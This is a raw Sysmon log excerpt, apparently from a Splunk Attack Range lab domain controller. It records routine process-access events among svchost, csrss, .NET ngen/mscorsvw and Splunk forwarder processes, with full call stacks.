13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4600-6000-3F03-000000009A01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.550{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4600-6000-3F03-000000009A01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.551{08A6967A-4600-6000-3F03-000000009A01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000007361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:16.504{08A6967A-4600-6000-3E03-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\105c-0\System.Configuration.dll2021-01-14 13:24:16.504 10341000x80000000000000007360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.019{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4600-6000-3E03-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.019{08A6967A-45FF-6000-3D03-000000009A01}49162032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.004{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4600-6000-3E03-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:16.004{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4600-6000-3E03-000000009A01}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.988{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4601-6000-4403-000000009A01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.988{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4601-6000-4403-000000009A01}3740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.926{08A6967A-4601-6000-4303-000000009A01}18123048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4601-6000-4303-000000009A01}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:17.754{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791